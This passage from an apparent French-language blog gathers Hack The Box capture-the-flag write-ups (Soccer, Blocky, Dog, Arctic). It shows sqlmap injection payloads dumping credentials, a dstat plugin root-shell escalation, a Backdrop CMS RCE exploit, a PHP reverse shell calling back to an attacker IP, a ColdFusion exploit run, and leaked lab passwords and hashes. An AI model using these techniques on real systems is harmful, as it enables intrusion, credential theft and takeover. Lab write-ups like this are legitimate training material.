[Y/n/q] Y [09:14:53] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [09:14:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: JSON id ((custom) POST) Type: time-based blind Title: MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP) Payload: {\u0026#34;id\u0026#34;:\u0026#34;1 AND (SELECT 3147 FROM (SELECT(SLEEP(5)))ioMT)\u0026#34;} Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: {\u0026#34;id\u0026#34;:\u0026#34;-3742 OR 8591=8591\u0026#34;} --- [09:14:56] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL \u0026gt;= 5.0.12 [09:14:56] [INFO] fetching columns for table \u0026#39;accounts\u0026#39; in database \u0026#39;soccer_db\u0026#39; [09:14:56] [INFO] resumed: 4 [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 5 [09:14:56] [INFO] resumed: email [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 2 [09:14:56] [INFO] resumed: id [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 8 [09:14:56] [INFO] resumed: password [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 8 [09:14:56] [INFO] resumed: username [09:14:56] [INFO] fetching entries for table \u0026#39;accounts\u0026#39; in database \u0026#39;soccer_db\u0026#39; [09:14:56] [INFO] fetching number of entries for table \u0026#39;accounts\u0026#39; in database \u0026#39;soccer_db\u0026#39; [09:14:56] [INFO] retrieved: 1 [09:14:57] [INFO] retrieving the length of query output [09:14:57] [INFO] retrieved: 17 [09:14:59] [INFO] retrieved: player@player.htb [09:14:59] [INFO] retrieving the length of query output [09:14:59] [INFO] retrieved: 4 [09:15:00] [INFO] retrieved: 1324 [09:15:00] [INFO] retrieving the length of query output [09:15:00] [INFO] retrieved: 20 [09:15:02] [INFO] retrieved: PlayerOftheMatch2022 [09:15:02] [INFO] retrieving the length 
of query output [09:15:02] [INFO] retrieved: 6 [09:15:03] [INFO] retrieved: player Database: soccer_db Table: accounts [1 entry] +------+-------------------+----------------------+----------+ | id | email | password | username | +------+-------------------+----------------------+----------+ | 1324 | player@player.htb | PlayerOftheMatch2022 | player | +------+-------------------+----------------------+----------+ [09:15:03] [INFO] table \u0026#39;soccer_db.accounts\u0026#39; dumped to CSV file \u0026#39;/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb/dump/soccer_db/accounts.csv\u0026#39; [09:15:03] [INFO] fetched data logged to text files under \u0026#39;/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb\u0026#39; [*] ending @ 09:15:03 /2025-03-12/ SSH connection to \u0026ldquo;player\u0026rdquo; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ ssh player@soc-player.soccer.htb The authenticity of host \u0026#39;soc-player.soccer.htb (10.10.11.194)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:PxRZkGxbqpmtATcgie2b7E8Sj3pw1L5jMEqe77Ob3FE. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added \u0026#39;soc-player.soccer.htb\u0026#39; (ED25519) to the list of known hosts. player@soc-player.soccer.htb\u0026#39;s password: Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Mar 12 13:15:53 UTC 2025 System load: 0.0 Usage of /: 72.7% of 3.84GB Memory usage: 29% Swap usage: 0% Processes: 244 Users logged in: 0 IPv4 address for eth0: 10.10.11.194 IPv6 address for eth0: dead:beef::250:56ff:fe94:b9b0 0 updates can be applied immediately. 
The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19 player@soccer:~$ ls user.txt player@soccer:~$ cat user.txt 5868.....2f04 Privilege Escalation SUID Binary : doas On trouve le binaire SUID \u0026ldquo;doas\u0026rdquo; qui semble suspect, grâce à linpeas. En cherchant sur internet, on comprend comment il peut etre exploité. Dans un premier, il faut chercher le fichier de configuration :\n1 2 3 4 player@soccer:/usr/local/share/dstat$ find / -type f -name \u0026#34;doas.conf\u0026#34; 2\u0026gt;/dev/null /usr/local/etc/doas.conf player@soccer:/usr/local/share/dstat$ cat /usr/local/etc/doas.conf permit nopass player as root cmd /usr/bin/dstat On remarque que player à le droit d\u0026rsquo;executé /usr/bin/dstat en tant que root.\nAprès quelques recherches, on remarque sur linpeas qu\u0026rsquo;un dossier \u0026ldquo;/usr/local/share/dstat\u0026rdquo; est modifiable par root. Or, dstat a une liste de plugins qu\u0026rsquo;il peut recherche et load depuis certains dossiers, dont notamment celui là. C\u0026rsquo;est à dire que si on met un plugin dans ce dossier, nous avons un moyen d\u0026rsquo;executer le code de ce plugin en executant dstat. 
Nous avon le droit d\u0026rsquo;executer dstat en tant que root, le plugin va donc etre loadé puis son code executé avec les permissions super utilisateur :\n1 2 3 4 5 6 7 8 player@soccer:/usr/local/share/dstat$ echo \u0026#39;import os; os.execv(\u0026#34;/bin/sh\u0026#34;, [\u0026#34;sh\u0026#34;])\u0026#39; \u0026gt; ./dstat_xxx.py player@soccer:/usr/local/share/dstat$ /usr/local/bin/doas /usr/bin/dstat --xxx /usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module\u0026#39;s documentation for alternative uses import imp ## whoami root ## cat /root/root.txt 8217.....cc19 ","date":"2025-03-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/soccer-htb/","title":"HTB | Soccer"},{"content":" Machine name OS IP Difficulty Blocky Linux 10.10.10.37 Easy Users 1 notch : 8YsqfCTnvxAUeduzjNSXe22 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.37 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 ProFTPD 1.3.5a 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8= | 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) |_ssh-ed25519 
AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://blocky.htb |_http-server-header: Apache/2.4.18 (Ubuntu) 8192/tcp closed sophos reset ttl 63 25565/tcp open minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20) Foothold Wordpress website : jar files Sur le port 80, on trouve un wordpress avec un endpoint /plugins. En effectuant une requête GET vers cette page, on trouve 2 fichiers dont BlockyCore.jar contenant le mot de passe suivant : 8YsqfCTnvxAUeduzjNSXe22\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ strings com/myfirstplugin/BlockyCore.class com/myfirstplugin/BlockyCore java/lang/Object sqlHost Ljava/lang/String; sqlUser sqlPass \u0026lt;init\u0026gt; Code localhost root 8YsqfCTnvxAUeduzjNSXe22 LineNumberTable LocalVariableTable ... FTP/SSH notch On trouve le user notch sur la page principale du wordpress. On l\u0026rsquo;utilise pour se connecter en ftp, avec le mot de passe trouvé précédemmente et ça fonctionne :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ ftp 10.10.10.37 Connected to 10.10.10.37. 220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37] Name (10.10.10.37:kali): notch 331 Password required for notch Password: 230 User notch logged in Remote system type is UNIX. Using binary mode to transfer files. 
ftp\u0026gt; ls 229 Entering Extended Passive Mode (|||25323|) 150 Opening ASCII mode data connection for file list drwxrwxr-x 7 notch notch 4096 Jul 3 2017 minecraft -r-------- 1 notch notch 33 Mar 10 09:54 user.txt 226 Transfer complete ftp\u0026gt; get user.txt local: user.txt remote: user.txt 229 Entering Extended Passive Mode (|||28224|) 150 Opening BINARY mode data connection for user.txt (33 bytes) 100% |*********************************************************************************************************************************************************************************************| 33 315.94 KiB/s 00:00 ETA 226 Transfer complete 33 bytes received in 00:00 (1.75 KiB/s) ftp\u0026gt; ^D 221 Goodbye. ┌──(kali㉿kali)-[~/htb/Blocky] └─$ cat user.txt 28f5.....2047 On peut également se connecte en SSH.\nPrivilege Escalation notch -\u0026gt; root L\u0026rsquo;utilisateur notch à le droit d\u0026rsquo;effectuer n\u0026rsquo;importe quelle commande en tant que root. Il nous suffit donc d\u0026rsquo;ouvrir un shell avec sudo su pour obtenir les droits root sur la machine.\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ ssh notch@10.10.10.37 notch@Blocky:~$ sudo -l [sudo] password for notch: Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL notch@Blocky:~$ sudo su root@Blocky:/home/notch# cat /root/root.txt dc80.....2689 ","date":"2025-03-10T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/blocky-htb/","title":"HTB | Blocky"},{"content":" Machine name OS IP Difficulty Dog Linux 10.10.11.58 Easy Users 1 2 3 mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop tiffany : BackDropJ2024DS2024 johncusack : BackDropJ2024DS2024 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ┌──(kali㉿kali)-[~/htb/Dog] └─$ nmap 
-sC -sV -An -T4 -vvv -p- 10.10.11.58 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) | ssh-rsa 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 | 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y= | 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file \u0026#39;description\u0026#39; to name the... |_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... |_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-generator: Backdrop CMS 1 (https://backdropcms.org) | http-robots.txt: 22 disallowed entries | /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register | /user/password /user/login /user/logout /?q=admin /?q=comment/reply | /?q=filter/tips /?q=node/add /?q=search /?q=user/password |_/?q=user/register /?q=user/login /?q=user/logout |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Home | Dog Foothold website with .git files | git-dumper On trouve un serveur web avec un dossier .git. 
On peut donc utiliser git-dumper pour récupérer des fichiers et faire un git log eventullement pour trouver des infos:\nmysql credentials Après analyse des fichiers, on trouve des credentials dans le fichier settings.php :\n\u0026lsquo;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop\u0026rsquo;\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~/htb/Dog] └─$ git-dumper http://10.10.11.58/.git/ ./website ┌──(kali㉿kali)-[~/htb/Dog] └─$ cd website/ ┌──(kali㉿kali)-[~/htb/Dog] └─$ grep -rni \u0026#34;\\$database =\u0026#34; website/settings.php:15:$database = \u0026#39;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop\u0026#39;; website/core/modules/simpletest/tests/database_test.test:3653: $database = Database::getConnection(); website/core/modules/system/system.admin.inc:2625: $database = $databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;]; website/core/includes/install.inc:491: $database = $modified_connection_info[\u0026#39;default\u0026#39;][\u0026#39;database\u0026#39;]; website/core/includes/install.inc:796: $database = NULL; website/core/includes/install.core.inc:904: $database = $databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;]; website/core/includes/install.core.inc:973: $database = isset($databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;]) ? $databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;] : array(); website/core/includes/install.core.inc:1022: $database = $form_state[\u0026#39;values\u0026#39;][$driver]; Tiffany \u0026ldquo;tiffany@dog.htb\u0026rdquo;\n1 2 3 4 5 ┌──(kali㉿kali)-[~/htb/Dog/website] └─$ grep -rni \u0026#34;@dog.htb\u0026#34; .git/logs/HEAD:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root \u0026lt;dog@dog.htb\u0026gt; 1738963331 +0000 commit (initial): todo: customize url aliases. 
reference:https://docs.backdropcms.org/documentation/url-aliases .git/logs/refs/heads/master:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root \u0026lt;dog@dog.htb\u0026gt; 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: \u0026#34;tiffany@dog.htb\u0026#34; Backdrop CMS - Authenticated RCE Grâce au compte administrateur de tiffany, on va pouvoir exploiter une RCE de backdrop CMS v1.27.1 et uploader un fichier shell.php :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ┌──(kali㉿kali)-[~/htb/Dog] └─$ searchsploit backdrop cms --------------------------------------------------------- Exploit Title | Path --------------------------------------------------------- Backdrop CMS 1.20.0 - \u0026#39;Multiple\u0026#39; Cross-Site Request Forgery (CSRF) | php/webapps/50323.html Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) | php/webapps/52021.py Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51597.txt --------------------------------------------------------- Shellcodes: No Results ┌──(kali㉿kali)-[~/htb/Dog] └─$ searchsploit -m php/webapps/52021.py Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) URL: https://www.exploit-db.com/exploits/52021 Path: /usr/share/exploitdb/exploits/php/webapps/52021.py Codes: N/A Verified: True File Type: Python script, Unicode text, UTF-8 text executable Copied to: /home/kali/htb/Dog/52021.py ┌──(kali㉿kali)-[~/htb/Dog] └─$ mv 52021.py RCE.py ┌──(kali㉿kali)-[~/htb/Dog] └─$ python3 RCE.py http//dog.htb Backdrop CMS 1.27.1 - Remote Command Execution Exploit Evil module generating... Evil module generated! 
shell.zip Go to http//dog.htb/admin/modules/install and upload the shell.zip for Manual Installation. Your shell address: http//dog.htb/modules/shell/shell.php Quand on va a l\u0026rsquo;addresse specifier pour installer le module avec le code malicieux, on trouve un message :\nThe Zip PHP extension is not loaded on your server. You will not be able to download any projects using Project Installer until this is fixed. Impossible donc d\u0026rsquo;installer un module .zip comme le propose l\u0026rsquo;exploit. Cependant, on trouve un bouton un peu plus bas : Manual Installation Upload a module Ensuite on met notre zip mais on a: The specified file shell.zip could not be uploaded. Only files with the following extensions are allowed: tar tgz gz bz2. On remplace donc notre .zip par un .tar : ça fonctionne ! Notre code php est bien présent à l\u0026rsquo;addresse spécifié par l\u0026rsquo;exploit python: http//dog.htb/modules/shell/shell.php\nPour obtenir un reverse shell stable facilement, on va uploader directement un code php \u0026lsquo;php-reverse-shell.php\u0026rsquo; provenant de github en modifiant notre ip et port:\n1 2 3 4 5 6 7 8 9 10 11 12 13 ## php-reverse-shell.php ... set_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;10.10.14.10\u0026#39;; // CHANGE THIS $port = 1337; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; ... On obtient un shell en tant que www-data :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ## Firefox http://dog.htb/modules/shell/shell.php ----------------------------------------- ┌──(kali㉿kali)-[~/htb/Dog] └─$ nc -lnvp 1337 listening on [any] 1337 ... 
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.58] 46688 Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux 14:57:07 up 17:27, 0 users, load average: 0.05, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@dog:/$ export TERM=xterm export TERM=xterm www-data@dog:/$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/Dog] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 www-data@dog:/$ whoami www-data www-data -\u0026gt; johncusack Mysql connection On peut se connecter a la base de données mysql rapidement avec les credentials trouvés précédemment:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 www-data@dog:/$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \\g. Your MySQL connection id is 12917 Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu) Copyright (c) 2000, 2025, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type \u0026#39;help;\u0026#39; or \u0026#39;\\h\u0026#39; for help. Type \u0026#39;\\c\u0026#39; to clear the current input statement. mysql\u0026gt; use backdrop; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql\u0026gt; select name,pass,mail from users; +-------------------+---------------------------------------------------------+----------------------------+ | name | pass | mail | +-------------------+---------------------------------------------------------+----------------------------+ | | | | | jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. 
| jPAdminB@dog.htb | | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@dog.htb | | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@dog.htb | | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@dog.htb | | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@dog.htb | | axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@dog.htb | | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | rosa@dog.htb | | tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@dog.htb | +-------------------+---------------------------------------------------------+----------------------------+ 9 rows in set (0.00 sec) john, jobert - hashcat bruteforce passwords We have the following users who can get a shell on the server:\nwww-data@dog:/$ cat /etc/passwd | grep sh$ root:x:0:0:root:/root:/bin/bash jobert:x:1000:1000:jobert:/home/jobert:/bin/bash johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash So we first try to crack jobert's and john's passwords, using hashcat:\n$S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. No result with rockyou! We drop this lead (same for the other hashes)\njohncusack Still trying the same password, BackDropJ2024DS2024, with john: it works! We can then connect over SSH with this user on the Linux machine:\n┌──(kali㉿kali)-[~/htb/Dog] └─$ ssh johncusack@dog.htb The authenticity of host 'dog.htb (10.10.11.58)' can't be established. ED25519 key fingerprint is SHA256:M3A+wMdtWP0tBPvp9OcRf6sPPmPmjfgNphodr912r1o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? 
yes Warning: Permanently added 'dog.htb' (ED25519) to the list of known hosts. johncusack@dog.htb's password: <------------ BackDropJ2024DS2024 Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64) ... ... Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Mar 9 08:36:06 2025 from 10.10.14.2 johncusack@dog:~$ whoami johncusack johncusack@dog:~$ cat user.txt cb5b.....1388 Privilege escalation johncusack : 'bee' as superuser We can run the \"/usr/local/bin/bee\" binary as the superuser:\njohncusack@dog:~$ sudo -l [sudo] password for johncusack: Matching Defaults entries for johncusack on dog: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User johncusack may run the following commands on dog: (ALL : ALL) /usr/local/bin/bee We look at the options of the bee command:\njohncusack@dog:/var/www/html$ sudo bee 🐝 Bee Usage: bee [global-options] <command> [options] [arguments] Global Options: --root Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory. --site Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory. .... .... ADVANCED eval ev, php-eval Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop. php-script scr Execute an arbitrary PHP file after bootstrapping Backdrop. 
Looking more closely, we find two interesting options:\neval php-script We first try php-script, which seems to take a PHP file as a parameter and execute it:\njohncusack@dog:/var/www/html$ sudo bee php-script ✘ Argument 'file' is required. We then try creating a PHP reverse shell 'shell.php' and passing it as the parameter:\njohncusack@dog:~/.temp$ ls shell.php johncusack@dog:~/.temp$ sudo bee php-script shell.php ✘ The required bootstrap level for 'php-script' is not ready. We get an error message. After some thought, the idea comes to me to run a PHP file from the directory holding the web server's PHP files. Maybe those can be modified and then executed?\njohncusack@dog:/var/www/html$ sudo bee php-script index.php ℹ Notice: Constant BACKDROP_ROOT already defined in include() (line 17 of /var/www/html/index.php). ⚠ Warning: Cannot modify header information - headers already sent by (output started at /backdrop_tool/bee/includes/errors.inc:142) in backdrop_goto() (line 867 of /var/www/html/core/includes/common.inc). After a try on the index.php file, there is no more error! It does seem to execute the code in that file. We can then:\nmodify a file such as index.php and run a reverse shell\ncreate a new PHP file with reverse shell code\nHowever, we do not have the rights to modify/create files. Only www-data can do that. We have access to the www-data account, so no problem. We create a file s.php with code that opens a reverse shell, and it works:\njohncusack@dog:/var/www/html$ sudo bee php-script s.php johncusack@dog:/var/www/html$ ℹ Notice: Undefined variable: daemon in printit() (line 184 of /var/www/html/s.php). 
Successfully opened reverse shell to 10.10.14.10:1338 ℹ Notice: Undefined variable: daemon in printit() (line 184 of /var/www/html/s.php). We do get a shell as root:\n┌──(kali㉿kali)-[~/htb/Dog] └─$ nc -lnvp 1338 listening on [any] 1338 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.58] 39820 Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux 15:29:16 up 18:00, 2 users, load average: 0.02, 0.05, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT johncusa pts/2 10.10.14.10 15:19 4.00s 0.16s 0.16s -bash johncusa pts/3 10.10.16.2 15:21 35.00s 0.05s 0.05s -bash uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off ## whoami root ## cat /root/root.txt 5a2f.....adc2 ","date":"2025-03-09T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/dog-htb/","title":"HTB | Dog"},{"content":" Machine name OS IP Difficulty Arctic Windows 10.10.10.11 Easy System Info Host Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-507-9857321-84451 Original Install Date: 22/3/2017, 11:09:45 ?? System Boot Time: 9/3/2025, 4:20:09 ?? System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. 
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 6.143 MB Available Physical Memory: 4.964 MB Virtual Memory: Max Size: 12.285 MB Virtual Memory: Available: 11.080 MB Virtual Memory: In Use: 1.205 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.11 Enumeration nmap $ nmap -sC -sV -An -p- 10.10.10.11 HTTP -> Port 8500 Foothold Adobe Coldfusion 8 We reach a login page for the server administrators: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm\nWe note that it is the Adobe ColdFusion 8 service. We directly find a Python PoC on searchsploit and get a shell on the machine:\n$ python3 exploit.py ... Printing some information for debugging... lhost: 10.10.14.10 lport: 1337 rhost: 10.10.10.11 rport: 8500 payload: 097d871e33a84bc8a3ed6002724b19ee.jsp Deleting the payload... Listening for connection... Executing the payload... listening on [any] 1337 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49235 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\ColdFusion8\\runtime\\bin> whoami arctic\\tolis Stabilize powershell First, I had to get a better cmd.exe because it was not stable at all. It was impossible to get a PowerShell directly (stable or not). 
Then, with this new stable cmd.exe (thanks to an SMB share server and an nc.exe), I was able to use a new reverse shell to get a stable PowerShell with the help of the nishang repo and Invoke-TcpXXX.ps1.\n┌──(kali㉿kali)-[~/htb/Arctic] └─$ impacket-smbserver share . Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.11,49414) [*] AUTHENTICATE_MESSAGE (ARCTIC\\tolis,ARCTIC) [*] User ARCTIC\\tolis authenticated successfully [*] 